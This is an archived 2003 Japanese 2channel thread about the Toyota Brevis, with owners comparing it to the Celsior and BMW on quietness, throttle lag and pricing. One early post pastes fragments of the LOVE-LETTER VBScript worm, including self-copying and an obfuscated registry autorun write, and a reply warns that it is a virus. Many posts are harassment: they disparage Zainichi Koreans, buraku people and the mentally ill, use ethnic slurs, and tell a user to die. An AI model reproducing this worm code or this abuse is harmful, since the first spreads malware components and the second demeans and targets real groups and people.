5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

●【セルシオスピリッツ=ブレビス】 part III ●

1 :トヨタ大好き親爺:03/07/16 01:28 ID:12Bld4yg
オヤヂの自慢
文句つける奴は許さんド〜


2 :名無しさん@そうだドライブへ行こう:03/07/16 01:29 ID:EfHnWlVv
     ____
    /∵∴∵∴\
   /∵∴∵∴∵∴\
  /∵∴∴,(・)(・)∴|
  |∵∵/   ○ \|
  |∵ /  三 | 三 |  / ̄ ̄ ̄ ̄ ̄
  |∵ |   __|__  | <うるせー馬鹿!!
   \|   \_/ /  \_____
     \____/


3 :旧スレは↓:03/07/16 01:31 ID:12Bld4yg
http://hobby2.2ch.net/auto/index.html#1

4 :旧スレは↓:03/07/16 01:35 ID:12Bld4yg
http://hobby2.2ch.net/test/read.cgi/auto/1052669489/l50

5 :名無しさん@そうだドライブへ行こう:03/07/16 02:15 ID:IGqRI71J
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

6 :名無しさん@そうだドライブへ行こう:03/07/16 02:16 ID:IGqRI71J
      ▓       ▓
      ▓█     ▓█
    ▓▓██   ▓▓██
   ▓▓▓▓▓▓▓▓▓▓▓███
 ▓▓▓██▓▓▓▓▓██▓▓███
 ▓▓█▓▓▓▓▓▓▓▓▓█▓███
 ▓▓▓▓█▓▓▓▓▓█▓▓▓███
 ▓▓▓▓▓█████▓▓▓▓███↑はウイルスです。ノートンとかでチェックしてみ
  ▓▓▓▓▓███▓▓▓▓███
    ▓▓▓▓▓▓▓▓▓███
  ▓▓▓▓▓▓▓▓▓▓▓▓███
 ▓▓▓▓▓▓▓▓▓▓▓▓▓▓███
 ▓▓▓▓▓▓▓▓▓▓▓▓▓▓███

7 :名無しさん@そうだドライブへ行こう:03/07/16 07:28 ID:H3gtLCsz
>3にワロタ

8 :名無しさん@そうだドライブへ行こう:03/07/16 14:28 ID:qPDM4AHr
ここですか?
セルシオが買えなかった人同士で慰めあうスレ

9 :名無しさん@そうだドライブへ行こう:03/07/16 20:31 ID:ewmXE0HK
独逸車を買ふ奴は非国民

10 :名無しさん@そうだドライブへ行こう:03/07/16 22:34 ID:Vmd0cOup
ホントにあったんだ

11 :名無しさん@そうだドライブへ行こう:03/07/17 00:38 ID:SvzfbxuJ
>>3のリンク先に行ったら
http://hobby2.2ch.net/test/read.cgi/auto/1058155123/
ですた

12 :名無しさん@そうだドライブへ行こう:03/07/17 00:40 ID:YIHoWqFr
トヨタの高価格車だから、ブレビスも静粛性は低くない
生意気にも競合車と考えているBMWと比較しても、その点だけは
優っているといっていいぐらいだ。(もちろんBMの場合は、運転は
エンジン音ある程度聞きながらやるものだという設計思想があるし、
エンジン音の質自体、トヨタ車とは違って不快なものではないから
本当をいえば優っているというのは問題であろうけど)

しかし、ブレビスの静粛性もヒュンダイXGにはかなわないぞ
BMなどを目標にするのではなく、今度のモデルではXGをめざして
開発するべきではないのか?無論、キャッチコピーには、
「ヒュンダイをしのぐ」とかいうたぐいの文句を使用するべきであろう。
この車の性格を考えた場合、その方が販売戦略上もきっとうまくゆく筈だ。

13 :800:03/07/17 00:43 ID:xCcDlh1r
>>12
私のウキウキ彼女は、彼女の友達が持っているカローラの方が静かだし
乗り心地がいいと行ってます。やっぱり中古BMだからダメなんでしょうか?
ここのところショック続きで、いい加減自分の車がキライになってきました。

14 :名無しさん@そうだドライブへ行こう:03/07/17 01:11 ID:XuNUFWMg
>12
新車情報のデータによると同等と出てますが
ヒュンダイXGの方が静かというデータのソースは何ですか?

15 :名無しさん@そうだドライブへ行こう:03/07/17 02:50 ID:bOoDXXR0
>>800=>>13は労働階級の親に育てられ車はおろか免許すら無い無職の
引き篭もりの童貞。
十代の頃から、顔が気持ち悪いといじめられ今でも外出すれば女子高生にも
顔がキモィと言われ外出できなくなりネットだけが生きがいのキモヲタ
当然、教習所などには通えないきも豚の童貞
息をしているだけの生ゴミ・家畜


16 :渓谷:03/07/17 03:00 ID:bOoDXXR0
このスレは

ブレビスオーナ
在日・部落・貧民・下っ端・薄給・低学歴・デブオヤジ・雑魚・不細工
と>>800の引き篭もりの無免許の車無し精神異常者だけのスレです。

セレブ・日本人・高学歴・高収入の方の書き込みを禁じます

        以上      Byブレ豚オヤジ

17 :警告:03/07/17 03:06 ID:bOoDXXR0
このスレは

ブレビスオーナ
在日・部落・貧民・下っ端・薄給・低学歴・デブオヤジ・雑魚・不細工
と>>800の引き篭もりの無免許の車無し精神異常者だけのスレです。

セレブ・日本人・高学歴・高収入の方の書き込みを禁じます
特にセルシオ・BMWにお乗りの方は控えてください
我々は、これ以上惨めになりたくないです。


        以上      By腋臭ブレ豚オヤジ 夏




18 :名無しさん@そうだドライブへ行こう:03/07/17 03:18 ID:nevJEHoP
また、アンチブレビスの、気違い=精神異常者=精神病院入院患者が暴れるのか。
お前と接する近所の人や友達や同僚は、お前のことストーカーや粘着って呼んでてるんだよな。
気持ち悪いから避けられてるんだろ。
その仲間はずれの恨みをこのスレにぶつけてるようだが、それはお前自身の
人格が原因なので、自分を治さないと解決しないよ。
ここに書き込み続けるとどんどんエスカレートして異常者の度合いが高まってしまうから、
もう書き込みしないほうがいいと思うよ。

このスレに書き込んだお前の文章を親兄弟や友人・恋人・知人・同僚に堂々と見せられるか?
見せられないような恥ずかしくて、自分の品位をおとすような書き込みはもうやめたら?
なにより自分の首を絞めてることになるんだよ。

19 :名無しさん@そうだドライブへ行こう:03/07/17 03:22 ID:bOoDXXR0
>>18はお前の自画像だな
精神異常者の変態オヤジ


20 :名無しさん@そうだドライブへ行こう:03/07/17 03:24 ID:Q3OMJmIn
>>14
元ネタはチョン批評家が「ヒュンダイ車の静粛性は、腕時計の針の動く音が聞こえるほど優れている」
という電波丸出しの解説から。


で、ヒュンダイのダメ車をからかう時に使うネタとしてトヨタ(セルシオ)より優れたヒュンダイと
嫌味たっぷりに書き込みます

21 :名無しさん@そうだドライブへ行こう:03/07/17 03:25 ID:bOoDXXR0
豚が一匹

22 :名無しさん@そうだドライブへ行こう:03/07/17 03:28 ID:nevJEHoP
仮にブレビスを叩いてるのをA君だとしよう。
A君に想像して欲しいのだが、女の子がA君はこういう書き込みをしているのを
知ったらA君と恋人になりたいと思うだろうか?
同じように男だったらA君と友達になりたいと思うだろうか?
人事部の人はA君を採用したいと思うだろうか?
親は喜ぶだろうか?
なぜそんなに周りのみんなに嫌われるようなことをするのだ?
なぜそんなに自分を魅力のない人間にしてしまうのか?

周りの人だけじゃない、自分だってこんな書き込みする人間とは友達になりたくないはずだ。
つまり、自分で自分のことを嫌ってるはずだ。

ブレビスを叩いているようで、実は自分自身を激しく叩いてることに
気が付いてほしいと思う。

23 :名無しさん@そうだドライブへ行こう:03/07/17 03:33 ID:bOoDXXR0
>>22
aho

24 :名無しさん@そうだドライブへ行こう:03/07/17 03:47 ID:bOoDXXR0
このスレは

ブレビスオーナ
在日・部落・貧民・下っ端・薄給・低学歴・デブオヤジ・雑魚・不細工
と>>800の引き篭もりの無免許の車無し精神異常者だけのスレです。

セレブ・日本人・高学歴・高収入の方の書き込みを禁じます
特にセルシオ・BMWにお乗りの方は控えてください
我々は、これ以上惨めになりたくないです。


        以上      By腋臭ブレ豚オヤジ 夏

>>25->>1000
となります。


25 :名無しさん@そうだドライブへ行こう:03/07/17 06:33 ID:J6sdMf3v
ID:bOoDXXR0こいつもう来ないと言ってた奴だろ
粘着キティの上に嘘つきか・・救いようがねーな
見栄っ張りなとこは○○の特徴だし
長田の貧民屈で妄想でも見てろ

26 :名無しさん@そうだドライブへ行こう:03/07/17 10:29 ID:YIHoWqFr
ブレビスの3000って2500とほとんど一緒だって噂だけど
買う意味あるわけ(ステータスとかは別として)


27 :名無しさん@そうだドライブへ行こう:03/07/17 12:08 ID:F1nvQh7I
ID:bOoDXXR0の行為は偽計業務妨害罪になります。

刑法
第三十五章 信用及び業務に対する罪
(信用毀損及び業務妨害)
第二百三十三条  虚偽の風説を流布し、又は偽計を用いて、人の信用を毀損し、又はその業務を妨害した者は、三年以下の懲役又は五十万円以下の罰金に処する。

トヨタ自動車(株)に通報しましょうか?

現在2chではどこからアクセスしたかのログが保存されるバージョンなので、
捜査の要請があるとログを開示しなくてはなりません。
その場合プロバイダのアクセス日時から容易に個人情報が判明します。
住所・氏名・電話番号など。

今後も続けるなら通報するということを、ここに警告します。

28 :名無しさん@そうだドライブへ行こう:03/07/17 22:05 ID:YIHoWqFr
在日・部落ネタは放置してマターリといこうぜ
もう秋田

29 :名無しさん@そうだドライブへ行こう:03/07/17 22:05 ID:/y3o/fo+
ID:bOoDXXR0
此奴は煽りでなく荒らし。
この手のヤツは放っておくのが一番。
皆さん放置徹底でいきましょう。
煽ってるアホの相手するのは結構楽しいのだが。

800の中古BM君、俺は君が好きなので、
是非積極的に書き込んで欲しいと思います。

>>26
俺は3000だが、そりゃ低速(街乗り)の余裕は違うよ。
大排気量NAの気持ちよさはここしかないけど。
他車の4000も気持ちいいけど、車重が違う分、
3000でも充分だね。
ブレビスに限れば3000と2500では安全装備や快適装備など
価格差以上に3000がお買い得だったような・・
最近のグレード構成は知らないけど、発表当初はそうだった。



30 :名無しさん@そうだドライブへ行こう:03/07/17 22:29 ID:J6sdMf3v
>>28
同意

折れも800ならOKよん

31 :名無しさん@そうだドライブへ行こう:03/07/18 01:23 ID:YWJc0wd5
っていうか、今までのパターンからID:bOoDXXR0が出てこない限り
800も出てこないだろう、残念ながら

32 :ハリ蔵さん:03/07/18 02:28 ID:8p2XhDBw
BMW買ってしまいました
2003.6.9 add
7月に待望の第二子が誕生する予定である。
これまで、何とかハリアー1台でやりくりしてきたが、いよいよ2台目の車が必要になるかも知れないと考えていた。
考えていたのは、私だけという話もあるが。。。。
そんなある日、とってもお買い得なBMWを発見。
ふつふつと物欲(所有欲?)が沸いてきてしまい、子どもの誕生というドサクサに紛れて購入となりました。。。。
まだ生まれていないというのに。

とにかく現行型3シリーズ(E46型)のスタイルの良さと言ったら、もう。美しい!
このスタイルにほれ込んで、勢い余って購入してしまいました。




エクステリアのみならず、インテリアもとってもいい感じです。
夜のイルミネーションの演出もなかなか凝っています。アンバーな色合いがエロティックです(笑)

で、ドライバーズインプレッションですが、1900ccの118馬力というスペック上はとっても非力なエンジンですが、何ともトルクフル。
ハリアーの2.2Lエンジンよりもずーっと扱いやすく、パワーも感じます。まあ、ハリアーと比較しても意味ないですが。ましてや2.2Lエンジンでねぇ。
100km→120kmあたりの追越し加速や、高速安定性は、ちょっと感動ものです。高速走行の静粛性も申し分なしですね。
さらに、FRという駆動系とボディ剛性の高さが相まって、曲がるというものが、こんなに楽しいものだと初めて知りました。
これまで、外車なんて興味なかったけど、ちょっと見方変わりました。絶賛しすぎの感もありますが、うーん、ドイツ人恐るべし。

あっ、もちろんハリアーは売りませんからね。BMWはあくまでセカンドカーですから。。。

33 :名無しさん@そうだドライブへ行こう:03/07/18 04:08 ID:r2M+UA3t
>32
あなたは正常です。
正しい選択眼を持った方です。
ただ、ここに書き込むのはどうかと思います。
ここにいる方達は、車音痴な上にバカで無能ときております。
あなたがいくらBMWを絶賛してもここのバカたちには理解する知能すらありません。
その証明としてブレビスという恥ずかしい車に辿りついたのです。
セルシオが買えなかったクズ同士で慰めあっているのです。
どうか、そっとしてあげて下さい。

34 :800:03/07/18 04:51 ID:KpYGykqO
800です。
私のことを歓迎してくれるようですので正直にお話します。
実は、自分は無職で無免許で車無しなんです。
芦屋の豪邸に住みBMWを乗り廻し高学歴のイケ面で女の子にもモテモテの
奴が羨ましかったんです。だから奴に粘着していたんです。
私といえば、長屋に住み労働階級の底辺職の父親を持ち自転車しかなく
低学歴でキモ面で彼女いない歴=年齢で童貞です。
奴とはまったく正反対の境遇に育った自分にとって奴が死ぬほどにくかったの
です。車の免許はほしいんですが教習所に通うお金すらありません。
先日電車に乗ってると女子高生達から毎度の事ですがきもィと
指までさされ、もー限界です。電車に乗れません。
免許習得を決めました。20万貯金はじめました。
中古国産軽めざして頑張ります。
ただ、残念ながら先日また精神科医から通院を依頼され入院をすることに
なりました。
しばらくは、「精神病院の車椅子乗り」として参加します。
よろしくお願いします。





35 :名無しさん@そうだドライブへ行こう:03/07/18 04:52 ID:vChOmIFd
☆貴方を癒す女の子たちのサイトです☆
http://endou.kir.jp/yuminet/link.html

36 :名無しさん@そうだドライブへ行こう:03/07/18 05:09 ID:4WI2mWua
プログレとどっちがいいのよ?

37 :名無しさん@そうだドライブへ行こう:03/07/18 05:14 ID:FfWOJesZ
マーク2の一番安いのがいいよ

38 :名無しさん@そうだドライブへ行こう:03/07/18 05:14 ID:AJSVFvjI
プアマンズ ベンツ セルシオ
成金路線はやめれ
現行セルシオにしてもベンツのバッタ物

セルシオが無かったらブレビスはいい車だと思う

トヨタはパクルのは天下一品だがオリジナリティに欠けてる企業でつね

39 :名無しさん@そうだドライブへ行こう:03/07/18 05:52 ID:fHdEjv/3
なーんだブレビスかよ

    ^  ^は・ず・か・し^^

40 :名無しさん@そうだドライブへ行こう:03/07/18 08:48 ID:J432v8Mo
>>27
お前みたいな馬鹿が煽るから余計荒れることになるんだぞ。

41 :名無しさん@そうだドライブへ行こう :03/07/18 08:57 ID:dY37EM7Z
このスレパート1からずっとこんな流れですか?

42 :800:03/07/18 09:25 ID:GS7RUcjJ
隣の病棟の患者が奇声をあげてうるさいです。
私も負けずに叫びました。
早く退院して教習所に通いたいです
看護婦さんにもキモがられています
精神病院の車椅子乗りだけでは虚しすぎるのでたまには
また、中古BM乗りにもならせてもらいます。
ノートPCの充電が切れたので失礼します。



43 :名無しさん@そうだドライブへ行こう:03/07/18 11:23 ID:P5aIA0Se
ブレビスなかなか良いと思いますよ。私はホンダのフラッグシップ海苔だけど、
外観のデザインや乗り心地は良いよね。サイズもあの位がちょうど良いと個人的には
思います。小さいけど中身はしっかりという表現がふさわしいかな。

44 :名無しさん@そうだドライブへ行こう:03/07/18 12:23 ID:RHuDxSaR
>>29
私もAi300だけど、前車よりやっぱパワーあると感じます。
前車はプログレNC250。
直噴になってから、アクセル踏んでからワンテンポ遅れて進んで行く感はいがめないけど。

あと、PDPSとか装備差をOPで埋めていくと20万くらいが価格差な訳ですが、
Ai250にOPてんこもりよりはAi300を買っておいた方が下取り価格に反映されるので
特にPDPSを付ける予定のある方なら、思い切ってAi300をお勧めします。

セールスとの付き合いで買わされた割にはかなり良い買い物だったと満足してます。

45 :800 ◆FCMixLy9OQ :03/07/18 14:09 ID:YWJc0wd5
ウキウキ彼女と高速を走行していたのですが、彼女に「この車、まっすぐ走れないの?」
って言われちゃいました。事故車だからでしょうか??高速安定性が悪いようです。
中古BMだから仕方ないか(笑)

(なんか800さんがもう一人現れたようですので、区別がつくようにトリップつけときますね!)


46 :800 ◆YsP554yc3s :03/07/18 14:19 ID:9mIYXrau
ちょっと待てよ、俺が本当の800だよ。
トリップなんで誰でも付けられるんだからよ。
キモ面粘着は放置願います。

47 :名無しさん@そうだドライブへ行こう:03/07/18 21:30 ID:CNUfLfns
>>46
オメーホントに粘着だな
お前こそよーく鏡を磨いてキモ面眺めてみろ
ほーら脂汗が出てきたろ
人前に出てくる面してないんだよ仮性包茎の粘着くん

48 :800:03/07/19 10:17 ID:IZdhlrcZ
私が最初の800ですが、別の800が二人も...。
今日はデート行って来ます!!

49 :名無しさん@そうだドライブへ行こう:03/07/19 11:46 ID:ufJAvJcY
面白すぎる。
今は区別がつかないが、そのうち判るだろう。

>>38
MBがセルシオを徹底研究したことを今更知らないガキが居るとは。
BMにも乗ってたことがあるが、ブレビスの足換えただけで
その領域に近づくことが出来る。とすると本体価格差は一体・・
ぼられてることに気が付きなさい。

>>44
価格差そんなにあったっけ?
20万はエンジンの差になるって事?


50 :名無しさん@そうだドライブへ行こう:03/07/19 12:50 ID:vi5VeDWm
>>49
オマエ来ないって言ってたんじゃねーのか?
とっとと失せろ!ヴォケ

51 :名無しさん@そうだドライブへ行こう:03/07/19 20:57 ID:JpYHy6S7
BMは中古車価格の値崩れがひどすぎるな。


52 :名無しさん@そうだドライブへ行こう:03/07/20 00:45 ID:QoB7Pj0t
>>50
49だが、お前誰かと勘違いしてないか?
勘違いなら俺を誰だと思ってるのか? 聞いておきたい。
そうじゃないとしたら、いきなり失敬なヤツだな!
前から書き込んでる、ガキの相手を引き受けた3000に乗ってるものだが。

53 :名無しさん@そうだドライブへ行こう:03/07/20 00:55 ID:/+Yyctzt
>>52
旗色悪くなった粘着荒らし34=42=46=50が
手を変えて自作自演しているものと思われ
本物の800は45

54 :名無しさん@そうだドライブへ行こう:03/07/20 01:20 ID:9wOsqPVJ
おお!
なるほど。
確かに45だな。
どうもありがとう。

55 ::800 ◇YsP554yc3s :03/07/21 06:40 ID:ijLmqcqX
まだ、精神病院に入院中です
早く免許欲しいです
取得後の車の購入について考えてみました。
シビック  頭が弱そうな貧乏人丸出しなのでやめました。
      値段はお手ごろだったんですが
BMW     
      私の憧れです。夢のまた夢です。
      中古BM考えてみましたが、私の家の長屋駐車スーぺースには
      中古とはいえ近所に顰蹙かうのであきらめます。
      やっぱり、BMは夢のまた夢です。虚しいのでこれからも
      せめて脳内中古BM乗りにはならさせてもらいます。
中古ブレビス
      無理です。あの臭そうなきもいブレビス乗りのオヤジの後に乗り継ごう
      なんで想像しただけでも吐き気がします。
      車内に、オヤジ臭・ポマード臭・悪臭・異臭が染み付いた
      中古ブレビス最悪でしょ。
ただ、冷静に考えてみたんです。教習所通う20万もないし
それに、キモ面で童貞、女友達はおろか友達もいない私に車が必要か?
いらないです車。  原付で十分でしょ。
これから原付免許取得目指して頑張ります。
  精神病棟より from 800     




56 :800 ◆FCMixLy9OQ :03/07/21 10:46 ID:woQiXfLz
ここのところ災難続きです。昨日、ウキウキ彼女とデートだったんですが、
吉野家の駐車場に中古BMを止めておいたら、ボンネットにクギのようなもので
下記のようにイタズラ書きされてしまいまいした。

     「  中    古    か    よ    !  」

彼女が気付かないフリをしてくれたのがせめてもの救いです。

57 :名無しさん@そうだドライブへ行こう:03/07/21 15:53 ID:nDPywicY
きょうも中古っぽいBMを見かけました
最近BM見かけるたびにひょっとして800なんて思うようになりました(w
>>56
それは災難でしたね でもあんまり気にしない方がいいですよ
気にしないでいられるとこが中古の良さですから
元新日の橋本もベンツに「小川」と書かれた後発奮して
いまじゃその小川といっしょに活躍してますよ(ちょっと話がずれたかも

58 :名無しさん@そうだドライブへ行こう:03/07/21 22:59 ID:WH3NXcnZ
ブレビスみたいな直噴のトヨタ車って、街乗りとか
高速でとろさを感じませんか?

59 :名無しさん@そうだドライブへ行こう:03/07/21 23:55 ID:oI0dgnbo
とろい?
一瞬のタイムラグがあると騒いでるヤツもいるが、
そんなもの、レースでもやってない限り気になる分けない。
0.1秒を気にするヤツは初めからこの手の車買うな。
どんな車もエンジンやアクセルに癖があるが、その範囲だ。
俺自身初めから気にもならなかった。
鈍感とかでなくて、普通気にするレベルではないと言うこと。
逆にこの程度に難癖つけるしかネタがないのか?と思ってしまう。
反論お待ちする。(たのむからまともな反論を・・)


60 :800 ◇FCMixLy9OQ :03/07/22 02:59 ID:Pz9H5ShJ
800の引き篭もりのキモヲタです。
さっそく、精神科医の先生に外出許可をもらったので原付の試験に行ってきました。
残念ながら50問中3問の正解で不合格でした。
芦屋の金持ちBM乗りに低脳・バカ・知障と言われ読けましたが、痛いほど
痛感させられました。引き篭もりの僕には実社会の洗礼を受ける事となりました。
なんだか、中古BM乗りを装ってきましたが恥ずかしくなってきました。
とてもじゃないですが車の免許なんて一生無理でしょう。
僕の生きがいはここで脳内彼女と中古BMデートしかありません。
産まれてこの方女性とデートはおろか会話すらしたことないですから、、、
こんな醜く歪んだ顔で外出すらできず、2chしか楽しみがない僕を
産んだ労働階級の父を恨みます。
                by   キモヲタ童貞800


61 :800 ◇FCMixLy9OQ:03/07/22 03:07 ID:Pz9H5ShJ
セルシオ本スレ内におけるブレビス評

352 :名無しさん@そうだドライブへ行こう :03/07/21 05:48 ID:LlGy9Vnz
コロナじゃん!ばっかじゃねーの?コロナがハンドル動くかよ!
BMWになれるかよ!

だそうです。

僕には中古ブレビスすら買えないですけど。

62 :名無しさん@そうだドライブへ行こう:03/07/22 03:27 ID:MMaZ5L9G
>56
この変態君って、間違いなくリアルでも車にくぎとかで傷とかつけてるよ。
普通の人ならこんな発想しないからね。
やっぱり、精神異常者の犯罪者は怖いね
これ、冗談なしでね。

    あーキモち悪ーー

63 :名無しさん@そうだドライブへ行こう:03/07/22 03:31 ID:MMaZ5L9G
ID:woQiXfLz=ID:nDPywicY

お前の自作自演って毎回バレバレなんだよ
なぜなら、お前の「名前」の書き込みの文字はすべて
青い文字だからな。(大爆笑

さっさと死ねよこの生きる生ゴミ

64 :名無しさん@そうだドライブへ行こう:03/07/22 06:53 ID:a2xhb7ea
>>59
いや、感じないのは明らかに鈍感。
踏んでから一拍置いて加速するのは誰でも分かる。俺の嫁でも分かった。
トヨタD-4の癖と割り切れば問題ないのだが、耐えられない人も居ておかしくない。
逆にセルシオと決定的に差があるとすれば、それくらい。

非直噴の2JZ載ってる奴があればなあ・・・


65 :800 ◆FCMixLy9OQ :03/07/22 07:12 ID:6Ea4hobN
それで、修理するお金もないし、とりあえず ”か” を ”だ” にタッチペンで修正して、

     「  中    古    だ    よ    !  」

にしておきました。やっぱ開き直りも大切でしょ?中古BMにのるんだったら(ウヒョ!

66 :名無しさん@そうだドライブへ行こう:03/07/22 11:19 ID:jYieeZRn
>>64 および59以外の皆様へ
59はブレビスの足を交換すればBMWと大差ないなどと本気で感じている
車音痴だから、放置が適当。しかも実際に欧州車を所有していた
(らしく)てこの程度の認識であるから救いようがない

67 :名無しさん@そうだドライブへ行こう:03/07/22 15:48 ID:NnE47dB1
>65
君もいい加減おもしろくもなんともないんで
消えてもらえます。
ご苦労さん               

68 :名無しさん@そうだドライブへ行こう:03/07/22 16:43 ID:xDiioNMT
>>67
良識あるブレビス乗りは既に>>800=>>65を完全放置・無視しております。

彼はブレビス乗りでもなければBM乗りでもありません。

頭が弱い人物ですので、どうかそっとしてあげて下さい。

69 :名無しさん@そうだドライブへ行こう:03/07/22 20:34 ID:zkYysHIu
>59>64>66
論点がずれてる気がするぞ
レスポンスだけでとろさを語っていいのか?

70 :名無しさん@そうだドライブへ行こう:03/07/22 22:23 ID:qXUIJw9Y
>>64
うん、だから癖の範囲であって、それに合わせた乗り方すればいいわけだ。
色んな車に乗ってるとすぐ慣れる。
あなたもそうだが、そんなに明らかであれば試乗時に気付いて誰も買いません。
それより2000〜3000rpmの低速トルクの出方が気に入ってる。
BMの3000はトルクもあり高回転も気持ちよかったが、
その肝心の高回転は殆ど使い道がなかった。
アリストの3000(NA)も明らかにブレビスより遅い。
以前借りて乗ったことがある日産のグロリア3000は
パワーがなさ過ぎて驚いたくらい。(最近のエンジンは違うかも)
と言うことで「とろい」という評価は当てはまらないと考える。
足回りについてもしかり。
変えたサスにもよるが、首都高を100km前後、高速で150km程度なら
まったく問題ございません。
BMの足回りが良いのは判る。しかしその良さをどこで実感する?
限界時のリアの追従性? 評論家やそれを鵜呑みにしているガキ共は
いったいどこを走ってるんだ?
まぁ、せいぜいボッたくられていい気分に浸っててくれ。
はっきり見栄で買ってる、余程金に余裕がある以外、いくら技術論を語っても、
日本国内での独車の価格に説明をつけることは出来ないはず。
(ここ数年のBM他の価格は知らないので間違ってたら失礼)
では。

71 :名無しさん@そうだドライブへ行こう:03/07/22 22:27 ID:qXUIJw9Y
長文失礼。
もし間違ってる認識であれば、どこがどうなのか、
「具体的」にご指摘願います。
しばらく来れないかも知れないので、
もしマジレスがあれば、時間が空いてしまうことをお詫びしておきます。
今までありませんでしたが・・

72 :名無しさん@そうだドライブへ行こう:03/07/22 23:24 ID:7ZMPAdFP
>70
ブレビス
世間の評価もカローラやコロナ並
実際、動力性能もカローラ並

どうせ見栄すらはれないんだからくだらない見栄はってないで
素直にカローラにでも乗ればいい(w

73 :名無しさん@そうだドライブへ行こう:03/07/22 23:33 ID:seSuciJk
>>動力性能もカローラ並
アフォ丸出し

74 :名無しさん@そうだドライブへ行こう:03/07/23 00:29 ID:BeRfnRLt
>>70 BMWの足回りの良さは普通に走ってて実感できるだろ・・

75 :名無しさん@そうだドライブへ行こう:03/07/23 00:42 ID:gpArgDOE
>>74
モレもそう思う。中低速でもレールの上を走るような安定性があり、
BMより高額なトヨタ車でも全然及ばなかった(クラウソ、
セルシオ、プログレぐらいしか乗ったことないけど、ほかはおって
しるべしと考える。ちなみにこのことはモレがBMの国内価格に納得
していることを意味するわけではない)それから運転席に座ったときの
落ち着き具合というか包まれ感がまるっきり違うわな。BMの方が安心
感がある。この辺は好みの問題があると思うけど、両方に乗車して
みたら明らかな違いが感じ取れるはずだ。むしろこれだけは絶対許せな
いことを上げるとすれば、BMのバックミラーの見づらさ。何かいい
対処方法はないのかね?>BM海苔各位(っていってもこんなところに
居るわけないか?藁)

76 :名無しさん@そうだドライブへ行こう:03/07/23 06:25 ID:a3yC0cP7
>>75
おってしるべし<馬鹿丸出し
能書きたれる前に日本語勉強しろ!!

77 :800 ◆FCMixLy9OQ :03/07/23 07:07 ID:sibhsdRI
また中古BMのボンネットにイタズラ書きされました。今度は、

     「  必    死    か    よ    !  」

だったので、

     「  必    死    だ    よ    !  」

に修正しました。この憎悪の連鎖はいつまで続くんでしょうか?
中古BMのボンネットを”落書き掲示板”として使わないで欲しいです。

78 :名無しさん@そうだドライブへ行こう:03/07/23 08:27 ID:gpArgDOE
>>76
正しい日本語に難癖つけるとは....
オマエやっぱりチョソだったな(藁)


79 :トヨタ ブレビス:03/07/23 09:34 ID:213QFgBf
プロフィール
ブレビスというトヨタの新型車は、早い話が「プログレの双子車」と考えていい。
2780mmという超ロングホイールベース(クラウンと同寸!)のフロアパン、2.5リッター〜3.0リッターの直列6気筒でFR駆動、サスペンション周りのレイアウト……。
目に見えないこのクルマの基本構造はプログレと共通だが、逆にいえば目に見える部分はすべて専用デザインであり、ランプやグリル周りだけをイジッた数年前の双子車とは次元が違う。
こんなクルマを次々と出せるのは、"技術の進歩"というべきか"勝ち組みトヨタ"の成せる技というべきか。
トヨペット店で販売されるプログレが50歳代向けだとすれば、トヨタ店扱いとなるブレビスは30歳〜40歳代がユーザーターゲットだという。
価格は同等モデルで比較すると10〜20万円ほどブレビスが高価だが、これはブレビスにディスチャージヘッドランプや16インチホイールが標準装備になる、といった部分での差額らしい。
スタイリングはどこからどう見ても"ミニ・セルシオ"という雰囲気。フロントグリルを換えれば、まさに縮小コピーといった印象で、メルセデス・ベンツSクラスとCクラス以上にソックリだ。

80 :トヨタ ブレビス:03/07/23 09:35 ID:213QFgBf
ペダル位置が調整できる!
デザインや装備類以外でプログレとの大きな違いは、シートやステアリングに加えて、ペダルの位置まで電動調整(前後方向)できるパワーアジャスタブルペダルという日本車初の新機構を備えていることが挙げられる。
大きなセダンに乗る小柄な女性が、ステアリングを抱きかかえるように運転している姿をよく見かけるが、ブレビスでは前後に70mm調整できるペダルを手前に設定すれば、そうした女性でもゆったりとしたドライビングポジションを取ることが可能。
運転のしやすさの問題だけでなく、シートベルトやエアバッグを含めた安全性に関わることだけに、このシステムは他車にもどんどん採用してほしいところである。
ブレビスの乗り味をひと言でいうと、「プログレよりも軽快で元気だが、静粛性と乗り心地はちょい落ち」といった印象だ。
サスペンションの設定は基本的にタイヤ、スプリング、ショックアブソーバーの3点がプログレと異なり、専用チューンとなっている。
全幅1.7mの5ナンバーサイズに徹底的にこだわったプログレでは、195/65タイヤが限界だというが、あえてその制約を振り払って全幅1720mmとしたブレビスでは、205/55R16〜215/45R17というワンサイズ太いタイヤを履かせてある。
プログレとブレビスの差はまさにそこにあって、タイヤの分だけ軽快さやスポーティさが増し、そのタイヤの分だけ乗り心地や静粛性はプログレの方が優っている。
とはいえ、両者の乗り味が"大人っぽい高級車"であることに違いはないのだが・・・・・・。

81 :トヨタ ブレビス:03/07/23 09:38 ID:213QFgBf
「ちょっとカジュアルがいい感じ」
ブレビスの兄弟分であるプログレは"小さな高級車"というコンセプトで、5ナンバーサイズ、セルシオと同じ高品質塗装、本木目ウッドパネル、静かさと重厚感あふれる乗り味……と、徹底したコダワリをもって生まれたクルマであり、そのデキは秀逸といえる。
それに対してブレビスは、全体的にカジュアルな雰囲気が増しており(インテリアも含めて)、セルシオ風のデザインともどもより理解しやすい商品性がアップした印象である。
ブレビス、プログレ、そして、少しだけホイールベースが短く、エンジンも2.0リッターとなるアルテッツァも付け加えると、トヨタはいつの間にやら、微妙にコンセプトの違う小型FRサルーンを3台もラインナップしたことになる。
水も漏らさぬ……というか、アリの一匹すら進入することが出来ないほどに完璧な布陣。
もう、トヨタの勢いを止めることが出来るヤツはいないのか?

82 :ブレビス Ai250 エクステリア&インテリア:03/07/23 13:32 ID:eNMPdkgP
トヨタは、ほとんど“力技”といえる勢いでミディアムクラスセダンのラインナップを強化している。
セダン市場は、全体として好調とはいえないだけに他メーカーは慎重な構えを見せているが、トヨタは大メーカーならではの底力を発揮。
それこそ“鳴かぬなら鳴かせてみせよう・・・・・・”状態だ。
とはいえ、決して無謀を冒しているわけではない。
トヨタには、他メーカーに先駆けて投入した新FRパッケージを持つ強みがある。
